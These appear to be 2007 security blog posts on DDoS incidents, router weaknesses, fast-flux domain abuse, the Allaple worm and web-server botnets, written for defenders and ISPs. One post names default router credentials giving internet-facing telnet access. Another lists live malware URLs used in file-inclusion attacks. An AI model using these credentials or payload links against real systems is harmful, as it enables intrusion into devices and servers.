WMD in Second Life

hi guys and gals, how are you all doing? :)

i’ve always been a fan of virtual worlds (although for my own life’s sake, i don’t participate in them). this time around it’s about what some refer to as a wmd, and i like it.


funny how history repeats itself and he couldn’t control his “virus”. :)

gadi evron,


War Fears Turn Digital After Data Siege in Estonia

The New York Times carries a good popular-level accounting of what happened in the recent Estonian information warfare incident. Suggested reading.

http://www.nytimes.com/2007/05/29/technology/29estonia.html (subscription required)
Syndicated: Times Daily


Botnets are old-fashioned – P2P networks are behind of massive DDoS attacks

The new trend in organizing Distributed Denial of Service attacks are P2P networks.

This is the way how Netcraft describes the situation:

large numbers of client computers running P2P software are tricked into requesting a file from the intended target of the DDoS, allowing the attacker to use the P2P network to overwhelm the target site with traffic.

The Netcraft entry points to FL-based Prolexic Technologies alert too sharing more technical details and information about the number of clients and the traffic being generated.
A very nice catch, Rich Miller of Netcraft!


DDoS against Finnish broadcasting company took 3 days

Today was the third day when the Web site of Finnish broadcasting company YLE (Yleisradio) suffer problems of large-scale DDoS attack.

From the YLE News site:

The company’s web pages were targeted by of a concerted attack on Monday and Tuesday. Two other major web sites, those of the telecommunications service provider Eniro, and the Suomi24 portal also reported similar attack.

There are several possible motives – Finland was the host of Eurovision Song Contest 2007 last weekend and our second place in hockey World Championship during the next day.

Some people said earlier that there was connections to recent DoS attacks on Estonian government sites too.


Broadband routers and botnets – being proactive

in this post i’d like to discuss the threat widely circulated insecure broadband routers pose today. we have touched on it before.

today, yet another public report of a vulnerable dsl modem type was posted to bugtraq, this time about a potential wireless flaw with broadband routers being insecure at deutsche telekom. i haven’t verified this one myself but it refers to “deutsche telekom speedport w700v broadband router”:

if you all remember, there was another report a few months ago about a uk isp named bethere with their wireless router being accessible from the internet and exploitable, as another example:

two issues here:
1. illegitimate access to broadband routers via wireless communication.
2. illegitimate access to broadband routers via the wan.

i’d like to discuss #2.

some isps which provide such devices (as in the example of #2 above) use them as bridges only, preventing several attack vectors (although not all). many others don’t. most broadband isps have a vulnerable user-base on some level.

many broadband isps around the world distribute such devices to their clients.

although the general risk is well known, like with many other security issues many of us remained mostly quiet in the hope of avoiding massive exploitation. as usual, we only delayed the inevitable. i fear that the lack of awareness among some isps for this “not yet widely exploited threat” has resulted in us not being proactive and taking action to secure the internet in this regard. what else is new, we are all busy with yesterday’s fires to worry about tomorrow’s.
good people will react and solve the problem when it pops up in wide-exploitation, but what we may potentially be facing is yet another vector for massive infections and the creation of eventual bot armies on yet another platform.

my opinion is, that with all these public disclosures and a ripe pool of potential victims, us delaying massive exploitation of this threat may not last. i believe there is currently a window of opportunity for service providers to act and secure their user-base without rushing. nothing in security is ever perfect, but actions such as changing default passwords and preventing connections from the wan to these devices would be a good step to consider if you haven’t already.

my suggestion would be to take a look at your infrastructure and what your users use, and if you haven’t already, add some security there. you probably have a remote login option for your tech support staff which you may want to explore – and secure. that’s if things were not left at their defaults.

then, i’d also suggest scanning your network for what types of broadband routers your users make use of, and how many of your clients have port 23 or 80 open. whether you provide with the devices or not, many will be using different ones set to default which may pose a similar threat. being aware of the current map of vulnerable devices of this type in your networks can’t hurt.

it is not often that we can predict which of the numerous threats out there that we do not address currently, is going to become exploited next. if you can spare the effort, i’d strongly urge you to explore this front and be proactive on your own networks.

the previous unaddressed threat which most of us chose to ignore was spoofing. we all knew of it for a very long time, but some of us believed it did not pose a threat to the internet or their networks for no other reason than “it is not currently being exploited” and “there are enough bots out there for spoofing to not be necessary”. i still remember the bitter argument i had with randy bush over that one. this is a rare opportunity, let’s not waste it.

we are all busy, but i hope some of you will have the time to look into this.

i am aware of and have assisted several isps, who spent some time and effort exploring this threat and in some cases acting on it. if anyone can share their experience on dealing with securing their infrastructure in this regard publicly, it would be much appreciated.


gadi evron,


A Botted Fortune 500 a Day

support intelligence releases daily reports on different fortune 500
companies which are heavily affected by the botnet problem, with many
compromised machines on their networks.

you can find more information on their blog:

they are good people, and they know botnets.

gadi evron,


On-going Internet Emergency and Domain Names

there is a current on-going internet emergency: a critical 0day vulnerability currently exploited in the wild threatens numerous desktop systems which are being compromised and turned into bots, and the domain names hosting it are a significant part of the reason why this attack has not yet been mitigated.

this incident is currenly being handled by several operational groups.

this past february, i sent an email to the reg-ops (registrar operations) mailing list. the email, which is quoted below, states how dns abuse (not the dns infrastructure) is the biggest unmitigated current vulnerability in day-to-day internet security operations, not to mention abuse.

while we argue about this or that tld, there are operational issues of the highest importance that are not being addressed.

the following is my original email message, elaborating on these above statements. please note this was indeed just an email message, sent among friends.

date: fri, 16 feb 2007 02:32:46 -0600 (cst)
from: gadi evron
to: reg-ops@…
subject: [reg-ops] internet security and domain names

hi all, this is a tiny bit long. please have patience, this is important.

on this list (which we maintain as low-traffic) you guys (the
registrars) have shown a lot of care and have become, on our sister mitigation and research lists (those of you who are subscribed), an integral part of our community we now call “the internet security operations community”.

we face problems today though, that you can not help us solve under the current setting. but only you can help us coming up with new ideas.

day-to-day, we are able to report hundreds and thousands of completely bogus phishing and other bad domains, but both policy-wise and resources-wise, registrars can’t handle this. i don’t blame you.

in emergencies, we can only mitigate threats if one of you or yours are in control.. just a week ago we faced the problem of the dolphins stadium being hacked and malicious code being put on it:

1. we tracked down all the ip addresses involved and mitigated them (by we i mean also people other than me. many were involved).
2. we helped the dolphins stadium it staff take care of the malicious code on their web page – specifically gary warner).
3. we coordinated with law enforcement.
4. we coordinated that no one does a press release which will hurt law enforcement.
5. we did a lot more. including actually convincing a chinese registrar to pull one of the domains in question. a miracle. there was another domain to be mitigated, unsuccessfully.

one thing though – at a second’s notice, this could all be for nothing as the dns records could be updated with new ip addresses. there were hundreds of other sites also infected.

even if we could find the name server admin, some of these domains have as many as 40 nss. that doesn’t make life easy. then, these could change, too.

this is the weakest link online today in internet security, which we in most cases can’t mitigate, and the only mitigation route is the domain name.

every day we see two types of fast-flux attacks:
1. those that keep changing a records by using a very low ttl.
2. those that keep changing ns records, pretty much the same.

now, if we have a domain which can be mitigated to solve such
emergencies and one of you happen to run it, that’s great…
however, if we end up with a domain not under the care of you and yours.. we are simply.. fucked. sorry for the language.

icann has a lot of policy issues as well, and the good guys there can’t help. icann has enough trouble taking care of all those who want money for .com, .net or .xxx.

all that being said, the current situation can not go on. we can no longer ignore it nor are current measures sufficient. it is imperative that we find some solutions, as limited as they may be.

we need to be able to get rid of domain names, at the very least during real emergencies. i am aware how it isn’t always easy to distinguish what is good and what is bad. still, we need to find a way.

members of reg-ops:
what do you think can be conceivably done? how can we make a difference which is really needed on today’s internet?

please participate and let me know what you think, we simply can no longer wait for some magical change to happen.


thousands of malicious domain names and several weeks later, we face the current crisis. the 0day vulnerability is exploited in the wild, and mitigating the ip addresses is not enough. we need to be able to “get rid” of malicious domain names. we need to be able to mitigate attacks on the weakest link – dns, which are not necessarily solved by dns-sec or anycast.

on reg-ops and other operational groups, we came up with some imperfect ideas on what we can make happen on our own in short term which will help us reach better mitigation, as security does not seem to be on the agenda of those running dns:

1. a system by which registrars can acknowledge confirmed bad domains (under strict guidelines) and respond to the reports according to their aup and icann policy, thus “getting rid” of them in a much quicker fashion, is being set up at the isotf.
a black list for registrars, if you will. this is far from perfect and currently slow-going. naturally, this can not be forced on all registrars, nor do the black hat ones, care.

2. a black list for resolvers (hopefully large service providers) is also being created at the isotf, so that the risk of visibility of bad domains, as will be defined, can be minimized. naturally, no provider can be forced to use this list and there are millions of unaffiliated resolvers, etc.

other options that have been raised as technically possible, but considered unlikely and indeed, bad:

3. setting up a black list of domain names for tld servers, for them not to respond on.

4. creating an alternate root which we could trust.

another suggestion which was raised:

5. apply to change the icann policy.

we need a solution. this operational issue needs to be added as a main agenda item today so that tomorrow we will be ready to mitigate it. i blame myself to some degree for not raising this with higher echelons 2 and 3 years ago due to respect to those who have been working on dns for many years, but what’s done is done.

the operational communities do not always know how to voice their needs or the difficulties they face. nor will everyone agree on what the issues are. it is my strong belief (which is obviously my personal opinion), based on facts we see in daily security operations on the internet that this issue is paramount, and i am sending here a call for help to the dns experts of the world: what is our next step to be?

what do we currently intend to do (not my personal opinion):
we are formalizing a letter to icann’s ssac, as they are the top experts on dns infrastructure security issues, coming from operational folks at the isotf dealing with daily usage of the dns for abuse purposes (and specifically fastflux).

further, the isotf is moving forward with items #1 and #2 as mentioned above. #3 will have to remain as a contingency, #4 we have no influence to affect. #5 is currently being explored.

are we missing a possible solution? what does the larger community suggest?

gadi evron,


Targets of Allaple DoS-worm released

Information about the target Web sites of polymorphic worm Allaple has been released. Finnish CERT-FI unit has posted information to Bleeding Edge Threats Wiki database.

According to the report the targets are

www.if.ee and

Note: The report is not fully visible when browsing with Safari. Firefox on XP and Mac are working OK.

AS Starman is Tallinn-based cable-TV operator and an ISP. If P&C Insurance Company is a subsidiary of Finnish Sampo Group.
Reportedly the worms have absolutely no Command and Control channels in them. I.e. if the author of the worm wants to disable these worms he or she can’t do it. The only solution is to patch these affected machines with MS04-012 – or format these workstations.

The first reports of the worm are from July 2006. This DoS attack is not a minor issue.
If you see this worm in your organization there are some typical characteristics:

* ICMP packets with the mystery string ‘Babcdefghijklmnopqrstuvwabcdefghi’
* HTTP GET requests to www.if.ee
* TCP SYN packets to www.if.ee (port 97)

This worm has several names – aka W32/Allaple-B, Rahack.W and Rahack.BB.


ICANN Releases Factsheet on Root DNS Attack

You can find their PDF document here:

(thanks Fergie)


Accidental backdoor by ISP [updated x2]

I’ve been a happy customer of my ISP BeThere for a few months now. Overall they’re great, they are quick to sort you out with your connection, their emails and other communications are very humerous and actually make good reading (I remember the routers documentation CD has a warning label reading something like “warning: geeky content inside”). When I signed up I managed to get the username root, this pleased me no end and I thought I’d finally found an ISP I want to stay with forever.

Finding the hole
Recently though a friend of mine was extremely bored and decided to nmap my IP address. He found, and told me, that I seemed to be listening on port 23, telnet. I was extremely puzzled by this, I haven’t port forwarded port 23, I would never use a telnet daemon for anything. It occured to me that it must be the router itself running the daemon. I telnetted to and lo and behold it asked me to log in. I log in with default credentials (yes, I had never gotten around to changing those), which are Administrator:null


How many bots? How many botnets?

we touched on this subject in the past, but recently rich kulawiek wrote a very interesting email to nanog to which i replied, and decided to share my answer here as well –

i stopped really counting bots a while back. i insisted, along with many friends, that counting botnets was what matters. when we reached thousands we gave that up.

we often quoted anti-nuclear weapons proliferation sentiments from the cold war, such as: “why be able to destroy the world a thousand times over if once is more than enough?” we often also changed it to say “3 times” as redundancy could be important. :>

today, it is clear the bad guys can get their hands on as many bots as they need, or in a more scary scenario, want. they don’t need that many.

as a prime example, i believe that verisign made it public that only 200 bots were used in the dns amplification attacks against them last year. even if they missed one, two or even three zeroes, it speaks quite a bit as to our fragile infrastructure.


Web Server Botnets and Server Farms as Attack Platforms

are file inclusion vulnerabilitiess equivalent to remote code execution? are servers (both linux and windows) now the lower hanging fruit rather than desktop systems?

in the february edition of the virus bulletin magazine, we (kfir damari, noam rathaus and gadi evron (me) of beyond security) wrote an article on cross platform web server malware and their massive use as botnets, spam bots and generally as attack platforms.

web security papers deal mostly with secure coding and application security. in this paper we describe how these are taken to the next level with live attacks and operational problems service providers deal with daily.

we discuss how these attacks work using (mainly) file inclusion vulnerabilities (rfi) and (mainly) php shells.
further, we discuss how isps and hosting farms suffer tremendously from this, and what can be done to combat the threat.


Web Honeynet Project: announcement, exploit URLs this Wednesday

important note: the name of the web honeynet project has been changed to the web honeynet task force to avoid confusion with the honeynet project.

[ warning: this post includes links to live web server malware propagated this wednesday via file inclusions exploits. these links are not safe! ]


the newly formed web honeynet project from securiteam and the isotf will in the next few months announce research on real-world web server attacks which infect web servers with:
tools, connect-back shells, bots, downloaders, malware, etc. which are all cross-platform (for web servers) and currently exploited in the wild.

the web honeynet project will, for now, not deal with the regular sql injection and xss attacks every web security expert loves so much, but just with malware and code execution attacks on web servers and hosting farms.

these attacks form botnets constructed from web servers (mainly iis and apache on linux and windows servers) and transform hosting farms/colos to attackplatforms.

most of these “tools” are being injected by (mainly) file inclusion attacks against (mainly) php web applications, as is well known and established.

php (or scripting) shells, etc. have been known for a while, as well as file inclusion (or rfi) attacks, however, mostly as something secondary and not much (if any – save for some blogs and a few mailing list posts a year ago) attention was given to the subject other than to the vulnerabilities themselves.

the bad guys currently exploit, create botnets and deface in a massive fashion and force isps and colos to combat an impossible situation where any (mainly) php application from any user can exploit entire server farms, and where the web vulnerability serves as a remote exploit to be followed by a local code execution one, or as a direct one.

what is new here is the scale, and the fact we now start engaging the bad guys on this front (which so far, they have been unchallenged on) – meaning aside for research, the web honeynet project will also release actionable data on offensive ip addresses, urls and on the tools themselves to be made availableto operational folks, so that they can mitigate the threat.

it’s long overdue that we start the escalation war with web server attackers, much like we did with spam and botnets, etc. years ago. several folks (andquite loudly – me) have been warning about this for a while, now it’s time to take action instead of talk. :)

note: below you can find sample statistics on some of the web honeynet project information for this last wednesday, on file inclusion attacks seeding malware.
you will likely notice most of these have been taken care of by now.

the first research on the subject (after looking into several hundred such tools) will be made public on the february edition of the virus bulletin magazine, from:
kfir damari, noam rathaus and gadi evron (yours truly).

the securiteam and isotf web honeynet project is supported by beyond security ( http://www.beyondsecurity.com )..

special thanks (so far) to: ryan carter, randy vaughn and the rest of the new members of the project.

for more information on the web honeynet project feel free to contact me.

also, thanks for yet others who helped me form this research and operations hybrid project (you know who you are).

sample report and statistics (for wednesday the 10th of january, 2007):

ip | hit count | malware (count), … | | 12 | http://m embers.lycos.co.uk/onuhack/cmd1.do? (4),
http://m embers.lycos.co.uk/onuhack/injek.txt? (6),
http://m embers.lycos.co.uk/onuhack/cmd.do? (2), | 11 | http://w ww.clubmusic.caucasus.net/administrator/cmd.gif? (more…)


CCC: Router and Infrastructure Hacking

1. at ccc last week raven alder gave a talk on the subject (router and infrastructure hacking), which was pretty neat!

i figure some of you may enjoy this. i hope the video for her talk becomes available soon.


2. there was also a lecture on sflow, by elisa jasinska:
presentation and paper:

3. i do wish the talk on how ccc set up their multiple-uplink gige network for the conference was filmed, i call this type of “create an isp in 24 hours”, in a very very hostile and busy environment such as at defcon or ccc “extreme networking”.

they got their own asn for 4 days. set up a hosting farm, surfing, mass wireless, etc. for users, and what-not. discovered a wireless network vulnerability, a router dos with nexthop memory issues, etc.
not to mention having to fight off ddoss non stop, fake aps, thousands of active and abusive users and bgp (i really liked their presentation on ripe’s bgplay – very cool stuff - http://www.ris.ripe.net/bgplay/ ).

3000 end points. 1.6 gigs up, 1.0 gigs down.

their slides are up at:


as mentioned before, ccc itself was very good and a lot of fun, there are many other presentations and videos available for download:


gadi evron,


Botnets, Security Ops and Boxing

What do they have in common?


Second Life: Virtual Worlds Botnet Attacks

hey, do i smell history repeating itself? bots on irc used to be useful too, and then used for local flooding. only later did they become the botnets that they are today. :)

so, from automated playing when you are not around to keep stuff active (rings a bell?) to botnets that throw… privates at people. :)


worth a read. i always love when the real world and the virtual meet, whether by marriages or by physical world police taking complaints because “someone stole my weapon on world of worldcraft!!”

we do live in interesting times. :)

gadi evron,